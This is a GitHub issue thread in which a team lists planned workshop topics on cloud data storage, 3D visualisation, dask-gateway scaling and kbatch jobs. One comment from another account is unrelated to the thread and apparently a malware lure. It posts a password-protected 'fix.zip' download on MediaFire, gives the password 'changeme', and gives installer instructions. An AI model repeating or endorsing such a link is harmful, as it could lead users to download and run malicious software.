### ISSUE TITLE
Compile DCT workshop ideas

### ISSUE THREAD

**Issue by SammyAgrawal** [leap-stc/data-and-compute-team#19]
Julius suggestions:
- (beginner) How to work with data in the cloud. Using object storage for science and sharing - I got all of the stuff for this one
- (medium) 3D visualization in the cloud. Understand + present your beautiful data better - This will be a medium amount of work, but I love this stuff haha.
- (advanced) Scaling up compute beyond a single server (dask-gateway + potential other options) - This one is easy for me to make
- (advanced) Running non-interactive compute jobs (using kbatch) - I am betting that we have enough material for this by october, but its a bit more of a gamble since it involves setting up things that we do not currently have implemented

SMART: number of ideas added, assigned to me, do by end of day Wednesday

Add three 30 minute idea pitches with reasonable depth

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SammyAgrawal** [comment]
- []
